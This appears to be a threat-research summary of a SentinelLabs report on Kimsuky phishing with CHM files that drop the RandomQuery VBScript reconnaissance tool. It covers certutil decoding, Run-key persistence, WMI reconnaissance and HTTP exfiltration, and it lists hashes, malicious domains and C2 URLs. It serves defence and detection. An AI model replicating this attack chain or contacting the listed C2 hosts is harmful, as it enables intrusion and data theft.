Threat Research

Kimsuky | Ongoing Campaign Using Tailored Reconnaissance Toolkit

SentinelOne

SentinelLabs describes a Kimsuky campaign delivering a VBScript variant of the RandomQuery reconnaissance tool via password-protected CHM attachments to exfiltrate system, folder, and process data. The report highlights the malware’s use of certutil decoding, registry persistence, HTTP-based C2/exfiltration, and malicious domains using uncommon TLDs. #Kimsuky #RandomQuery

Keypoints

  • Kimsuky distributed a VBScript-only RandomQuery variant via CHM attachments inside password-protected archives sent in targeted phishing emails.
  • The CHM contains a malicious Shortcut that writes a Base64 blob (e.g., mini.dat), decodes it with certutil to create a VBScript (e.g., mini.vbs), and establishes persistence via a Run registry key.
  • RandomQuery configures Internet Explorer/Edge registry settings, uses Microsoft.XMLHTTP to fetch and execute the second-stage VBScript, and performs reconnaissance via WMI queries.
  • The malware gathers three data classes: Basic System (Win32_ComputerSystem/Win32_OperatingSystem/Win32_Processor), Specific Folder (ShellSpecialFolderConstants IDs like Desktop, Documents, Downloads), and Process List (Win32_Process).
  • Collected data is Base64-encoded and exfiltrated via HTTP POST to C2 URLs (examples include file.com-port.space/indeed/show.php?query=97) using a distinctive boundary string.
  • Kimsuky uses purchased infrastructure with uncommon TLDs (.space, .asia, .click, .online) and domains that mimic .com naming to blend into links; registrar Onamae and ABLENET VPS hosting were observed.

MITRE Techniques

  • [T1566] Phishing – Use of targeted emails with malicious CHM attachments to deliver payloads. (‘The attached document is a CHM file stored in a password-protected archive.’)
  • [T1204.002] User Execution: Malicious File – The CHM requires a user Click to trigger the malicious Shortcut that creates and decodes payload files. (‘Consistent with known Kimsuky tactics, the CHM file contains a malicious Shortcut object that activates on the Click event.’)
  • [T1218] Signed Binary Proxy Execution (certutil) – certutil is abused to decode a Base64 blob into a VBScript, enabling covert payload creation. (‘Decodes the file using the certutil utility, creating a VB script…’)
  • [T1547.001] Registry Run Keys / Startup Folder – Persistence achieved by adding the created VBScript to the user’s Run registry key for execution at startup. (‘Establishes persistence by editing the HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun registry key…’)
  • [T1071.001] Application Layer Protocol: Web Protocols (HTTP/S) – The VBScript issues HTTP GET/POST requests to C2 URLs to retrieve and execute second-stage payloads and to send exfiltrated data. (‘The VB script issues a HTTP GET request to a C2 server URL…’)
  • [T1041] Exfiltration Over C2 Channel – Collected reconnaissance data is Base64-encoded and sent via HTTP POST to attacker-controlled endpoints. (‘RandomQuery first Base64-encodes it, and then constructs and issues an HTTP POST request containing the information to a C2 server URL…’)
  • [T1047] Windows Management Instrumentation – WMI classes (Win32_ComputerSystem, Win32_OperatingSystem, Win32_Processor, Win32_Process) are queried to collect system, hardware, and process details. (‘gathers system and hardware information using the Win32_ComputerSystem, Win32_OperatingSystem, and Win32_Processor WMI classes…’)
  • [T1083] File and Directory Discovery – Enumeration of user and system directories using ShellSpecialFolderConstants IDs to list files and directories of interest. (‘enumerates subdirectories and files within particular directories by specifying them using ID numbers of the Windows ShellSpecialFolderConstants enumeration…’)
  • [T1057] Process Discovery – Enumeration of running processes and session IDs via Win32_Process to build a process list. (‘enumerates the process and session IDs of running processes using the Win32_Process WMI class…’)
  • [T1583.003] Domain Registration – Acquisition of infrastructure using less-common TLDs and deceptive domain naming to host payloads and C2. (‘use of less common top-level domains (TLDs) for their infrastructure, such as .space, .asia, .click, and .online…’)

Indicators of Compromise

  • [SHA1 Hash] Sample payload hashes – 96d29a2d554b36d6fb7373ae52765850c17b68df, 84398dcd52348eec37738b27af9682a3a1a08492, and 4 more hashes
  • [Domains] Observed malicious domains – com-port[.]space, com-def[.]asia, com-www[.]click, and other domains listed in the campaign
  • [URLs/C2] Example C2/exfiltration endpoints – http://file.com-port.space/indeed/show.php?query=50, http://file.com-port.space/indeed/show.php?query=97
  • [Email Address] Phishing sender – bandi00413[@]daum.net used to send lure emails
  • [File names/paths] Dropped and generated files – %USERPROFILE%Linksmini.dat (Base64 blob), %USERPROFILE%Linksmini.vbs (decoded VBScript)

The technical attack flow begins with targeted phishing messages (sent from Daum addresses) containing a password-protected archive with a CHM lure. The CHM includes a malicious Shortcut object that, when clicked, writes a Base64-encoded blob (e.g., mini.dat) into %USERPROFILE%Links, uses certutil to decode that blob into a VBScript (mini.vbs), and establishes persistence by adding the VBScript to HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun so it executes at user logon.

The VBScript RandomQuery variant configures Internet Explorer/Edge-related registry values (to suppress first-run prompts and prevent redirection), then uses Microsoft.XMLHTTP to request a second-stage VBScript from attacker-controlled URLs. Once active, RandomQuery performs reconnaissance via WMI and Shell interfaces: it queries Win32_ComputerSystem, Win32_OperatingSystem, and Win32_Processor for Basic System details; enumerates files and subdirectories in targeted locations using ShellSpecialFolderConstants IDs (Desktop, Documents, Downloads, Program Files, etc.) for Specific Folder data; and enumerates running processes and session IDs through Win32_Process to build a Process List.

Collected data is Base64-encoded, packaged into HTTP POST requests (using a consistent boundary string such as c2xkanZvaXU4OTA) and transmitted to the same or similar C2 endpoints that hosted the payload (examples include file.com-port.space/indeed/show.php with varying query parameters). Infrastructure supporting these operations relied on domain registrations using uncommon TLDs (.space, .asia, .click, .online) and domain names crafted to resemble .com addresses; observed registrar and hosting services included Onamae and ABLENET VPS Hosting.

Read more: https://www.sentinelone.com/labs/kimsuky-ongoing-campaign-using-tailored-reconnaissance-toolkit/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint